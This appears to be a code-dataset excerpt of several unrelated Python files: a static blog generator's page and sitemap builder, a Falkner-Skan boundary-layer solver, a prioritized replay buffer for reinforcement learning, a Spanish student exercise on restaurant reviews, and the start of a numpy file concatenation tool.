.replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}',str(self.pages-1)+'.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n )\r\n self.sitemap(posts_url, Mode=\"a\") \r\n else: #一般页面 f\r\n print(\"f\")\r\n s1 = ''\r\n for i in range((self.pages-1)*self.articleMax, (self.pages-1)*self.articleMax+self.articleMax):\r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}',str(self.pages-1)+'.html')+page_nav_r.replace('{{right-link}}',\\\r\n str(self.pages+1)+'.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n )\r\n self.sitemap(posts_url ,Mode=\"a\")\r\n self.pages -=1\r\n if self.pages >0:\r\n self.Create_archive()\r\n \r\n \"\"\"生成站点地图sitemap\"\"\"\r\n def sitemap(self, URL=None, Mode=\"w\"): \r\n if URL == None:\r\n sitemapstring = \"\"\r\n for i in self.arr:\r\n sitemapstring = sitemapstring + self.site_url +\"/\"+self.HTML_url(i.md_url) + \"\\n\"\r\n try:\r\n File_io(\"{}/sitemap.txt\".format(self.dir_public) , Mode, \"utf-8\", DATA= sitemapstring)\r\n except:\r\n return False\r\n else:\r\n try:\r\n File_io(\"{}/sitemap.txt\".format(self.dir_public) , Mode, \"utf-8\", DATA=\"{}{}\\n\".format( self.site_url, URL.replace(self.dir_public, \"\") ) )\r\n except:\r\n return False\r\n return True\r\n \r\n \"\"\"线程调用函数\"\"\"\r\n def parse_main(self, thread_str, str):\r\n first = thread_str.first\r\n last = thread_str.last\r\n if str == \"PreGetmdDetail\":\r\n for i in range(first, last):\r\n self.GetmdDetail(i)\r\n print(\"id: %s\"%i)\r\n else:\r\n for i in range(first, last): \r\n self.parse_to_HTML(i, str)\r\n \r\n \"\"\"按长度确定节点可控制的长度,以此创建节点\"\"\"\r\n def CreatNode(self, length, thread_num):\r\n for i in range(thread_num):\r\n self.thread_srtarr.append( thread_str( i*length//thread_num, (i+1)*length//thread_num ) )\r\n print(\"已创建%s个结点用于存储区段信息\"%thread_num)\r\n \r\n \r\n \"\"\"最近文章\"\"\"\r\n def Recent_posts(self):\r\n out_file = \"{}/{}/recent_posts.html\".format(self.dir_public, self.dir_extra) #_public/extra/recent_posts.html\r\n s = '

Recent Posts

\\n
    \\n'\r\n for k in range(8):\r\n s1 = '\\t
  • {}
  • \\n'.format(self.HTML_url( self.arr[k].md_url ) , self.arr[k].title)\r\n s += s1\r\n s += \"
\\n\"\r\n with open(out_file, \"w\", encoding=\"utf-8\") as renc:\r\n renc.write(s)\r\n renc.close()\r\n \r\n \"\"\"\"主函数 调度用\"\"\"\r\n def Main(self, dir_template):\r\n temp_posts = \"{}/post.html\".format(dir_template) #post_tem.html => post.html\r\n temp_archive = \"{}/page.html\".format(dir_template) #archive_tem.html => page.html 原首页移到pages目录下。生成首页函数进行了修改。\r\n temp_subtle = \"{}/subtle_set.html\".format(dir_template) #未变\r\n \r\n isDIR(dir_template)\r\n \r\n if ( isFILE(temp_posts) and isFILE(temp_archive) and isFILE(temp_subtle) ):\r\n \"\"\"单页模板\"\"\"\r\n self.template_post = File_io(temp_posts, \"r\", \"utf-8\")\r\n \r\n \"\"\"导航页模板\"\"\"\r\n self.template_acrchive = File_io(temp_archive, \"r\", \"utf-8\")\r\n \r\n \"\"\"填充上面两个��板需要的小玩意\"\"\"\r\n archlink_Detail_data = File_io(temp_subtle, \"r\", \"utf-8\")\r\n \r\n self.archlink_Detail = re.compile(\"archive_post:(.*?)\\n\", re.S).findall(archlink_Detail_data) \r\n self.page_nav_l = re.search('page_nav_l:(.*?)\\n', archlink_Detail_data, re.S).group(1)\r\n self.page_nav_r = re.search('page_nav_r:(.*?)\\n', archlink_Detail_data, re.S).group(1)\r\n \"\"\"2022.9.3更新:使用jQuery load形式加载导航,舍弃之前做法。\"\"\"\r\n #self.menu = re.search(\"menu:(.*?)\\n\", archlink_Detail_data, re.S).group(1)\r\n else:\r\n print(\"模板文件夹里面欠缺必要的文件!\\n 请参考:https://github.com/qing2zijin/staticblog 进行搭建\")\r\n return False\r\n \r\n \"\"\"多线程读取文件,得到文件的细节\"\"\"\r\n self.findALLFile()\r\n len_md = len( self.md_rawlist )\r\n \r\n thread_list = list()\r\n thread_num = 5\r\n \r\n self.CreatNode(len_md, thread_num)\r\n \r\n \"\"\"使用线程读取md文件细节\"\"\"\r\n \r\n if len_md >= 40:\r\n for i in range(thread_num):\r\n thread_list.append( threading.Thread( target=self.parse_main, args=( self.thread_srtarr[i] , \"PreGetmdDetail\" ) ) )\r\n for i in range(thread_num):\r\n thread_list[i].start()\r\n \r\n for i in range(thread_num):\r\n thread_list[i].join()\r\n else:\r\n for k in range(len_md):\r\n self.GetmdDetail(k)\r\n\r\n thread_list.clear() #清空线程列表\r\n self.md_rawlist.clear()\r\n \r\n md2html.post_num = len(self.arr)\r\n if self.post_num == 0:\r\n return False\r\n \r\n \"\"\"直接插入排序\"\"\"\r\n if self.post_num >=2:\r\n for i in range(1, self.post_num):#这里不需要-1,因为下面已经有j = i-1,否则在列表最后一个排不到\r\n key = self.arr[i] \r\n j = i-1 \r\n while j>=0 and key.date.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"\") > self.arr[j].date.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"\"):\r\n self.arr[j+1] = self.arr[j]\r\n j-=1\r\n self.arr[j+1] = key\r\n \r\n self.sitemap() #生成sitemap.txt文件\r\n \r\n \"\"\"最近文章\"\"\"\r\n self.Recent_posts()\r\n \r\n \"\"\"置顶\"\"\"\r\n topArr = list()\r\n top = self.post_num - 1\r\n while top>=0:\r\n if(self.arr[top].topping.replace(\" \", \"\") == \"Yes\"):\r\n topArr.insert(0,self.arr[top]) #插入到列表topArr中\r\n del (self.arr[top]) #删除列表arr中该元素\r\n top -= 1 \r\n self.arr = topArr + self.arr #两个列表合并\r\n del topArr #删除列表topArr\r\n \r\n postsnum = 0 #能显示的有多少\r\n for i in range(self.post_num):\r\n if self.arr[i].is_archive == \"Yes\":\r\n postsnum += 1\r\n self.pages = int( postsnum/(self.articleMax) ) #向下取整\r\n if (self.pages * self.articleMax) < postsnum:\r\n self.pages += 1\r\n print('博客导航有%s页,每页最大含%s篇文章(%s篇非archive显示),合计转换%s篇文章。'%(self.pages, self.articleMax, self.post_num-postsnum, self.post_num))\r\n if(self.pages == 2):\r\n self.is_only2page = True #判断一开始就是不是只有两个页面\r\n \r\n \r\n \"\"\"\r\n if self.post_num == len_md:\r\n pass\r\n else:\r\n for i in range(thread_num):\r\n self.thread_srtarr[i].first = i* self.post_num//thread_num\r\n self.thread_srtarr[i].last = (i+1)*self.post_num//thread_num\r\n \"\"\"\r\n \r\n \"\"\"多线程渲染网页\r\n if self.post_num>=35: \r\n for i in range(thread_num):\r\n thread_list.append( threading.Thread( target=self.parse_main, args=( self.thread_srtarr[i] , str(i)) ) )\r\n for i in range(thread_num):\r\n thread_list[i].start()\r\n for i in range(thread_num):\r\n thread_list[i].join()\r\n else:\r\n for j in range(self.post_num): \r\n self.parse_to_HTML(j, \"Main\") \r\n \"\"\"\r\n \r\n \"\"\"单线程渲染网页\"\"\"\r\n for j in range(self.post_num): \r\n self.parse_to_HTML(j, \"Main\")\r\n \r\n \r\n for i in range(self.post_num-1,-1, -1): #倒序删除符合条件的元素\r\n if self.arr[i].is_archive != \"Yes\":\r\n del ( self.arr[i] )\r\n self.post_num = len(self.arr) \r\n \r\n \"\"\"生成目录\"\"\"\r\n self.Create_archive()\r\n \r\n \"\"\"删除各个结点\"\"\"\r\n thread_list.clear()\r\n self.thread_srtarr.clear()\r\n self.arr.clear()\r\n \r\n return True \r\n\r\n\r\n \r\n\r\nif __name__ == \"__main__\":\r\n \r\n start = time.time()\r\n \"\"\"---------------------------------------------------------------------------------\"\"\"\r\n source = \"raw\" #文章源\r\n output_ALL = \"_public\" #输出地址总文件夹\r\n output_DETAIL = \"posts\" #输出地址具体的文件夹 _public/posts\r\n output_PAGE = \"pages\" #输出地址分页文件夹 _public/pages\r\n output_RECENTPOSTS = \"extra\"\r\n dir_template = \"template/NEW\" #模板源\r\n \r\n isDIR(output_ALL)\r\n \r\n outfilePATH = \"{}/{}\".format(output_ALL, output_DETAIL) #_public/posts\r\n isDIR(outfilePATH)\r\n \r\n outfilePAGE = \"{}/{}\".format(output_ALL, output_PAGE) #_public/pages\r\n isDIR(outfilePAGE) \r\n \r\n outfileRECENT = \"{}/{}\".format(output_ALL, output_RECENTPOSTS) #_public/extra\r\n isDIR(outfileRECENT)\r\n \r\n \"\"\"-------------------------生成站点页首-----------------------------------------------------\"\"\"\r\n \"\"\"类别category有:life, work, study, exam, trip\"\"\"\r\n site_name = \"\" #博客名称\r\n site_url = \"\" #博客网址\r\n page_MaxNum = 12 #页面显示最大数量\r\n \r\n md = md2html(source, site_name, site_url, page_MaxNum, output_ALL, output_DETAIL, output_PAGE, output_RECENTPOSTS)\r\n md.Main(dir_template)\r\n del md\r\n \r\n \"\"\"------------------------------------------------------------------------------------\"\"\"\r\n print(\"程序总用时%s秒\"%(time.time()-start) )\r\n \r\n \"\"\"记录运行时间戳-----------------------------------------------------------------------\"\"\"\r\n #https://zhuanlan.zhihu.com/p/45113970 \r\n File_io(\"work.log\", \"a\", \"utf-8\",\\\r\n DATA = \"worklog:{}\\n\".format( \\\r\n time.strftime( '%Y.%m.%d.%H:%M:%S', time.localtime(start) ) \\\r\n ) \\\r\n ) \r\n","repo_name":"qing2zijin/staticblog","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":29522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17745662318","text":"#!/bin/python3\n\"\"\"----------------------------------------------------------------------------\nNumerical solution of Falkner-Skan wedge flow equation using\nfinite difference method\n----------------------------------------------------------------------------\"\"\"\n\n# importing needed modules\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom copy import copy as cp\nimport os\n\n# defining computation parameters----------------------------------------------\nm_values = [2,1,0.6,0.3,0,-0.05,-0.08]\neta_max = 10.0\nN_eta = 201\n\nN_iteration = 101\ntolerance = 1e-6\n\ndn = eta_max/(N_eta-1)\n\n# computation variables definition---------------------------------------------\nf_list = []; z_list = []\n\nf = np.zeros(N_eta)\n# z = np.zeros(N_eta)\n\n# applying initial and boundary conditions\nf[0] = 0\n# z[0] = 0\n# z[N_eta-1] = 1.0\nz = np.linspace(0,1.0,N_eta)\neta = np.linspace(0,eta_max,N_eta)\n\n# solution begin---------------------------------------------------------------\nfor m in m_values:\n # reinitializing conditions\n f = np.zeros(N_eta)\n z = np.linspace(0,1.0,N_eta)\n for itr in range(N_iteration):\n # marching the f equation from lower boundary\n for i in range(N_eta-1):\n f[i+1] = f[i] + 0.5*(z[i]+z[i+1])*dn\n\n # solving iteratively the z equation\n z_prev = cp(z)\n\n for j in range(1000):\n for i in range(1,N_eta-1):\n # computing coefficients\n ai = 2/dn**2 + m*z[i]\n bi = 1/dn**2 + (m+1)/4/dn*f[i]\n ci = 1/dn**2 - (m+1)/4/dn*f[i]\n di = cp(m)\n\n # solving equation\n z[i] = 1/ai*(bi*z[i+1] + ci*z[i-1]+di)\n # convergence check\n convergence = np.max(np.abs(z_prev - z))\n z_prev = cp(z)\n if convergence < tolerance:\n break\n\n # status update\n print(\"m = \",m,\"; iteration : \", itr,\"; z iteration : \",j,\n \"; z convergence = \",convergence)\n f_list.append(f)\n z_list.append(z)\n\n# post processing section------------------------------------------------------\n# obtaining computation variables\nf_d_list = z_list\nf_dd_list = []\n\n# computing f_double dash\nf_dd = np.zeros(N_eta)\nfor i in range(len(f_d_list)):\n z = f_d_list[i]\n f_dd = np.zeros(N_eta)\n for j in range(1,N_eta-1):\n f_dd[j] = (z[j+1] - z[j-1])/dn/2.0\n # linear interpolation on boundaries\n f_dd[0] = 2*f_dd[1] - f_dd[2]\n f_dd[N_eta-1] = 2*f_dd[N_eta-2] - f_dd[N_eta-3]\n\n print(\"name=\",i,\"\\n\",f_dd)\n\n # appending to list\n f_dd_list.append(f_dd)\n\n# preparing dataframe to store computed values to csv\n# refreshing storage directory\nos.system(\"rm -rf tables_csv && mkdir tables_csv\")\n# looping through each m_values\nfor i in range(len(m_values)):\n # preparing data frame\n fid = pd.DataFrame(np.transpose([eta,f_list[i],f_d_list[i],f_dd_list[i]]),\n columns=[\"eta\",\"f\",\"g\",\"h\"])\n # preparing filename\n fname = \"tables_csv/data_table_m=\"+str(m_values[i])+\".csv\"\n # writing to csv\n fid.to_csv(fname, index = None)\n\n\nplt.figure()\nfor i in range(len(m_values)):\n plt.plot(z_list[i],eta,label='m = '+str(m_values[i]))\nplt.grid()\nplt.legend()\nplt.xlabel(\"$u/u_e$\")\nplt.ylabel(\"$\\eta$\")\nplt.title(r\"$u/u_e$ vs $\\eta$\")\nplt.savefig(\"plot_1.png\", dpi = 150)\n\nplt.figure()\nfor i in range(len(m_values)):\n plt.plot(eta/2*z_list[i],eta,label='m = '+str(m_values[i]))\nplt.grid()\nplt.legend()\nplt.xlabel(r\"$\\left(v \\sqrt{Re_x}\\right)/u_e$\")\nplt.ylabel(r\"$\\eta$\")\nplt.title(r\"$\\left(v \\sqrt{Re_x}\\right)/u_e$ vs $\\eta$\")\nplt.savefig(\"plot_2.png\", dpi = 150)\n\nplt.show()\n","repo_name":"Ramkumar47/ComputationalCodes","sub_path":"09_NumericalSolution_of_FalknerSkan_equation/04_documentation/supporting_documents/02_question_2_and_3_codeDevelopment/01_FDM/script_FDM.py","file_name":"script_FDM.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25131630253","text":"# This code is based on code from OpenAI baselines. (https://github.com/openai/baselines)\nimport numpy as np\nimport random\n\nfrom common.segment_tree_sb import SumSegmentTree, MinSegmentTree\n\n\nclass ReplayBuffer(object):\n def __init__(self, size):\n self._storage = []\n self._maxsize = size\n self._next_idx = 0\n self.demo_len = 0\n\n def __len__(self):\n return len(self._storage)\n\n def add(self, obs_t, action, reward, obs_tp1, done, is_demo, obs_tpn=None, reward_n=None, done_n=None):\n data = (obs_t, action, reward, obs_tp1, done, is_demo, obs_tpn, reward_n, done_n)\n\n if self._next_idx >= len(self._storage):\n self._storage.append(data)\n elif self._storage[self._next_idx][5]:\n self._next_idx = self.demo_len\n self._storage[self._next_idx] = data\n else:\n self._storage[self._next_idx] = data\n self._next_idx = (self._next_idx + 1) % self._maxsize\n\n def _encode_sample(self, idxes):\n data = self._storage[0]\n ob_dtype = data[0].dtype\n ac_dtype = data[1].dtype\n obses_t, actions, rewards, obses_tp1, dones, is_demos, obses_tpn, rewards_n, dones_n = [], [], [], [], [], [], [], [], []\n for i in idxes:\n data = self._storage[i]\n obs_t, action, reward, obs_tp1, done, is_demo, obs_tpn, reward_n, done_n = data\n obses_t.append(np.array(obs_t, copy=False))\n actions.append(np.array(action, copy=False))\n rewards.append(reward)\n obses_tp1.append(np.array(obs_tp1, copy=False))\n dones.append(done)\n is_demos.append(is_demo)\n # n_step\n obses_tpn.append(np.array(obs_tpn, copy=False))\n rewards_n.append(reward_n)\n dones_n.append(done_n)\n if data[6] is None:\n return np.array(obses_t, dtype=ob_dtype), np.array(actions, dtype=ac_dtype), np.array(rewards, dtype=np.float32), \\\n np.array(obses_tp1, dtype=ob_dtype), np.array(dones, dtype=np.float32), np.array(is_demos, dtype=np.float32), \\\n None, None, None\n else:\n return np.array(obses_t, dtype=ob_dtype), np.array(actions, dtype=ac_dtype), np.array(rewards, dtype=np.float32), \\\n np.array(obses_tp1, dtype=ob_dtype), np.array(dones, dtype=np.float32), np.array(is_demos, dtype=np.float32), \\\n np.array(obses_tpn, dtype=ob_dtype), np.array(rewards_n, dtype=np.float32), np.array(dones_n, dtype=np.float32)\n\n def sample(self, batch_size):\n idxes = [random.randint(0, len(self._storage) - 1) for _ in range(batch_size)]\n return self._encode_sample(idxes)\n\n\nclass PrioritizedReplayBuffer(ReplayBuffer):\n def __init__(self, size, alpha):\n super(PrioritizedReplayBuffer, self).__init__(size)\n assert alpha >= 0\n self._alpha = alpha\n\n it_capacity = 1\n while it_capacity < size:\n it_capacity *= 2\n\n self._it_sum = SumSegmentTree(it_capacity)\n self._it_min = MinSegmentTree(it_capacity)\n self._max_priority = 1.0\n\n def add(self, *args, **kwargs):\n idx = self._next_idx\n super().add(*args, **kwargs)\n self._it_sum[idx] = self._max_priority ** self._alpha\n self._it_min[idx] = self._max_priority ** self._alpha\n\n # def _sample_proportional(self, batch_size):\n # res = []\n # p_total = self._it_sum.sum(0, len(self._storage) - 1)\n # every_range_len = p_total / batch_size\n # for i in range(batch_size):\n # mass = random.random() * every_range_len + i * every_range_len\n # idx = self._it_sum.find_prefixsum_idx(mass)\n # res.append(idx)\n # return res\n\n def _sample_proportional(self, batch_size):\n mass = []\n total = self._it_sum.sum(0, len(self._storage) - 1)\n # TODO(szymon): should we ensure no repeats?\n mass = np.random.random(size=batch_size) * total\n idx = self._it_sum.find_prefixsum_idx(mass)\n return idx\n\n # def sample(self, batch_size, beta):\n # assert beta > 0\n #\n # idxes = self._sample_proportional(batch_size)\n #\n # weights = []\n # p_min = self._it_min.min() / self._it_sum.sum()\n # max_weight = (p_min * len(self._storage)) ** (-beta)\n #\n # for idx in idxes:\n # p_sample = self._it_sum[idx] / self._it_sum.sum()\n # weight = (p_sample * len(self._storage)) ** (-beta)\n # weights.append(weight / max_weight)\n # weights = np.array(weights, dtype=np.float32)\n # encoded_sample = self._encode_sample(idxes)\n # return tuple(list(encoded_sample) + [weights, idxes])\n\n def sample(self, batch_size, beta = 0):\n \"\"\"\n Sample a batch of experiences.\n compared to ReplayBuffer.sample\n it also returns importance weights and idxes\n of sampled experiences.\n :param batch_size: (int) How many transitions to sample.\n :param beta: (float) To what degree to use importance weights (0 - no corrections, 1 - full correction)\n :param env: (Optional[VecNormalize]) associated gym VecEnv\n to normalize the observations/rewards when sampling\n :return:\n - obs_batch: (np.ndarray) batch of observations\n - act_batch: (numpy float) batch of actions executed given obs_batch\n - rew_batch: (numpy float) rewards received as results of executing act_batch\n - next_obs_batch: (np.ndarray) next set of observations seen after executing act_batch\n - done_mask: (numpy bool) done_mask[i] = 1 if executing act_batch[i] resulted in the end of an episode\n and 0 otherwise.\n - weights: (numpy float) Array of shape (batch_size,) and dtype np.float32 denoting importance weight of\n each sampled transition\n - idxes: (numpy int) Array of shape (batch_size,) and dtype np.int32 idexes in buffer of sampled experiences\n \"\"\"\n assert beta > 0\n\n idxes = self._sample_proportional(batch_size)\n weights = []\n p_min = self._it_min.min() / self._it_sum.sum()\n max_weight = (p_min * len(self._storage)) ** (-beta)\n p_sample = self._it_sum[idxes] / self._it_sum.sum()\n weights = (p_sample * len(self._storage)) ** (-beta) / max_weight\n weights = np.array(weights, dtype=np.float32)\n encoded_sample = self._encode_sample(idxes)\n return tuple(list(encoded_sample) + [weights, idxes])\n\n # def update_priorities(self, idxes, priorities):\n # assert len(idxes) == len(priorities)\n # for idx, priority in zip(idxes, priorities):\n # assert priority > 0\n # assert 0 <= idx < len(self._storage)\n # self._it_sum[idx] = priority ** self._alpha\n # self._it_min[idx] = priority ** self._alpha\n #\n # self._max_priority = max(self._max_priority, priority)\n\n def update_priorities(self, idxes, priorities):\n \"\"\"\n Update priorities of sampled transitions.\n sets priority of transition at index idxes[i] in buffer\n to priorities[i].\n :param idxes: ([int]) List of idxes of sampled transitions\n :param priorities: ([float]) List of updated priorities corresponding to transitions at the sampled idxes\n denoted by variable `idxes`.\n \"\"\"\n assert len(idxes) == len(priorities)\n assert np.min(priorities) > 0\n assert np.min(idxes) >= 0\n assert np.max(idxes) < len(self._storage)\n self._it_sum[idxes] = priorities ** self._alpha\n self._it_min[idxes] = priorities ** self._alpha\n\n self._max_priority = max(self._max_priority, np.max(priorities))","repo_name":"morikatron/DQfD","sub_path":"replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":7799,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"24507800457","text":"'''\nImplemente la funcion escribir_review(nombre_archivo,usuario,nombre_restaurante,puntaje,review) para que registre el review de una usuario. \n'''\ndef escribir_review(nombre_archivo,usuario,nombre_restaurante,puntaje,review):\n #usuario1,la hamburguesas de nina,5,deliciosas hamburguesas y la porcion super grande\n file=open(nombre_archivo,\"a\")\n file.write(\"\\n\"+usuario+\",\"+nombre_restaurante+\",\"+puntaje+\",\"+review)\n file.close()\n\n\n\n'''\nImplemente la funcion calcular_promedio_restaurante(nombre_archivo, nombre_restaurante) para que reciba el nombre del archivo con los reviews y el nombre de un restaurante y retorne la calificacion promedio del restaurante\n'''\ndef calcular_promedio_restaurante(nombre_archivo, nombre_restaurante):\n file=open(nombre_archivo,\"r\")\n #usuario1,la hamburguesas de nina,5,deliciosas hamburguesas y la porcion super grande\n calificacion_prom=[]\n for linea in file:\n usuario,restaurante,puntaje,review = linea.strip(\"\\n\").split(\",\")\n \n if restaurante == nombre_restaurante : \n calificacion_prom.append(int(puntaje))\n file.close()\n return sum(calificacion_prom)/len(calificacion_prom)\n # puntajes=[]\n # for line in file:\n # if usuario== line[1]:\n # puntajes.append(line[2])\n # puntajes1=int(puntajes)\n # prom_p=sum(puntajes1)/len(puntajes)\n # calificacion_prom+=prom_p\n #return calificacion_prom\n\n\n\n'''\nImplemente la funcion cargar_restaurante_info(archivo_restaurante, archivo_review) que reciba el nombre del archivo de restaurantes y el nombre del archivo de reviews y retorne un diccionario donde las claves son los nombres de los restaurantes y el valor asociado es es otro diccionario \n{\n \"la hamburguesas de nina\":\n {\n \"puntaje\": 4.33,\n \"ubicacion\":(5,7),\n \"platos\": ['hamburguesas','papas']\n },\n \"picanteria doña ceci\":\n {\n \"puntaje\": 4.5,\n \"ubicacion\":(2,4),\n \"platos\": ['ceviche','encebollado','bollo']\n },\n \"comidas de victor\":\n {\n \"puntaje\": 3,\n \"ubicacion\":(6,7),\n \"platos\": ['seco de pollo','menestra','bollo']\n },\n}\n'''\ndef cargar_restaurante_info(archivo_restaurante, archivo_review):\n fileRestaurantes=open(archivo_restaurante,\"r\")\n #la hamburguesas de nina,5|7,hamburguesas|papas\n \n dic = {}\n \n for linea in fileRestaurantes :\n \n restaurante,ubicacion,platos = linea.strip(\"\\n\").split(\",\")\n num1,num2 = ubicacion.split(\"|\")\n \n ubicacion = (int(num1),int(num2)) \n\n platos = platos.split(\"|\")\n puntaje = calcular_promedio_restaurante(archivo_review,restaurante)\n \n dic[restaurante]=dic.get(restaurante,{\"puntaje\":puntaje,\"ubicacion\":ubicacion,\"platos\":platos})\n \n return dic\n \n \n \n \n \n # dic_restaurantes={}\n # for data in file1:\n # data.strip(\"\\n\").split(\",\")\n # restaurante=data[0]\n # coordenadas=(data[1])\n # platos=(data[2]).split(\"|\")\n # for info in file2:\n # info.strip(\"\\n\").split(\",\")\n # puntaje=info[2]\n # #mira el comentario\n # dic_restaurantes[\"restaurante\"]=dic_restaurantes.get(restaurante,{\"puntaje\":puntaje,\"ubicacion\":coordenadas,\"platos\":platos})\n # return dic_restaurantes\n\n\n\n'''\nImplemente la funcion generar_reporte_plato(dic_restaurantes, nombre_plato) que recibe el diccionario con la informacion de los restaurantes y el nombre de un plato y genera un archivo con los nombres de los restaurantes que ofrecen el platillo con su puntaje promedio. El nombres del archivo generado es nombre_plato.txt\n'''\ndef generar_reporte_plato(dic_restaurantes, nombre_plato):\n file=open(nombre_plato+\".txt\",\"w\")\n \n for nombre_r,info_r in dic_restaurantes.items():\n if (nombre_plato in info_r[\"platos\"]) :\n file.write(nombre_r+\",\"+str(info_r[\"puntaje\"])+\"\\n\")\n \n # plato_r=dic_restaurantes[\"restaurante\"][\"platos\"]\n # puntaje_r=dic_restaurantes[\"restaurante\"][\"puntaje\"]\n # if nombre_plato == plato_r:\n # file.write(nombre_r,puntaje_r)\n file.close()\n\n\n'''\nImplemente la funcion criticos_destacados(archivo_reviews) que recibe el archivo de reviews y muestra en pantalla el nombre de los tres usuarios que mas reviews han hechos. \n'''\ndef criticos_destacados(archivo_reviews):\n file=open(archivo_reviews,\"r\")\n dic = {}\n for linea in file :\n usuario,restaurante,puntaje,review = linea.strip(\"\\n\").split(\",\")\n dic[usuario] = dic.get(usuario,0)\n dic[usuario]+=1\n lista_tuplas =list(dic.items())\n lista_orden = []\n for i in range(len(lista_tuplas)) : \n if len(lista_orden) < 3 :\n lista_orden.append(lista_tuplas[i])\n else : \n for j in range(len(lista_orden)):\n if (lista_tuplas[i][1] > lista_orden[j][1]) :\n lista_orden[j] = lista_tuplas[i]\n \n print(lista_orden)\n \n \n # usuario=[]\n # for line in file:\n # line.strip(\"\\n\").split(\"|\")\n # usuario_f=line[0]\n # for data in file:\n # usuario_nf=data[0]\n # if usuario_f == usuario_nf:\n # usuario.append(usuario_nf)\n\nARCHIVO_REVIEW = \"reviews.txt\"\nARCHIVO_RESTAURANTE = \"restaurantes.txt\"\n\n#probando\n\n#escribir_review(ARCHIVO_REVIEW , \"David\", \"los arbolitos\",'5',\"muy rico \")\n\n#prom = calcular_promedio_restaurante(ARCHIVO_REVIEW,'la hamburguesas de nina')\n#print(prom)\n\n#dic = cargar_restaurante_info(ARCHIVO_RESTAURANTE,ARCHIVO_REVIEW)\n#print(dic)\n\n#generar_reporte_plato(dic,\"menestra\")\n\ncriticos_destacados(ARCHIVO_REVIEW)\n\n\n\n\n# opcion = \"\"\n# while opcion!=\"4\":\n# print(\"1. registrar review\")\n# print(\"2. recomendar restaurante\")\n# print(\"3. criticos destacados\")\n# print(\"4. salir\")\n# opcion = input(\"ingrese opcion: \")\n# if opcion==\"1\":\n# print(\"Registrar review\")\n# nombre_usuario=input(\"ingrese nombre de usuario: \")\n# nombre_restaurante=input(\"ingrese nombre de restaurante: \")\n# puntaje=input(\"ingrese puntaje: \")\n# review=input(\"ingrese review: \")\n# f_review=escribir_review(\"reviews.txt\",nombre_usuario,nombre_restaurante,puntaje,review)\n# #TODO: REGISTRE EL REVIEW\n\n# elif opcion==\"2\":\n# print(\"Reporte plato\")\n# #PIDA AL USUARIO EL NOMBE DEL PLATO DEL QUE QUIERE EL REPORTE Y GENERE EL REPORTE\n# plato_nombre=input(\"Ingrese nombre del plato: \")\n# reporte_plato=generar_reporte_plato(dic_restaurantes,plato_nombre)\n \n# elif opcion==\"3\":\n# print(\"Criticos destacados\")\n# #MUESTRE LOS NOMBRES DE LOS CRITICOS DESTACADOS\n# print(criticos_destacados(\"reviews.txt\"))\n\n# else:\n# print(\"salir\")\n","repo_name":"davidperjac/ayudantias","sub_path":"3 SEMANA/mainEliana.py","file_name":"mainEliana.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32544807608","text":"#!/usr/bin/env python3\nimport sys\nimport io\nimport shutil\nimport argparse\nimport logging\n\nimport numpy as np\n\nERRNO_ARGS = 1\nERRNO_READ = 2\nERRNO_DATA = 4\nERRNO_WRITE = 8\nERRNO_INT = 130\n\nerrno = 0\n\nLOGGING_LEVEL = logging.WARNING\n\n\nclass ArgumentParser(argparse.ArgumentParser):\n def error(self, message):\n self.print_usage(sys.stderr)\n args = {'prog': self.prog, 'message': message}\n self.exit(ERRNO_ARGS, '{prog}: error: {message}\\n'.format(**args))\n\n\ndef make_parser():\n parser = ArgumentParser(\n prog='npycat',\n description='Concatenate or stack several npy files to one npy file.')\n parser.add_argument(\n '-s',\n '--stack',\n action='store_true',\n help='stack arrays rather than concatenate them')\n parser.add_argument(\n '-d',\n '--dim',\n type=int,\n default=0,\n help=('the dimension to concatenate/stack, default '\n 'to %(default)s'))\n parser.add_argument(\n '-O',\n '--output',\n metavar='OUTFILE',\n help=('the result will be written to OUTFILE. If '\n 'not specified, the raw bytes of the result '\n 'array (or text if `-H\\' is given) will be '\n 'written to stdout'))\n parser.add_argument(\n '-H',\n '--human-readable',\n dest='textwrite',\n action='store_true',\n help=('write to OUTFILE in text mode. Note that '\n 'error occurs if the underlying array is more '\n 'than 2D'))\n parser.add_argument(\n '-T',\n '--from-file',\n dest='from_file',\n metavar='FILE',\n help=('read filenames to concatenate/stack from FILE; use `-\\' '\n 'to denote stdin. In either case the filenames '\n 'should be placed one per line'))\n parser.add_argument(\n 'npyfiles',\n nargs='*',\n metavar='NPYFILE',\n help=('the npy files to concatenate/stack. '\n 'If none is given here and if `-T\\' is provided, then '\n 'the NPYFILEs will be obtained from FILE. '\n 'If 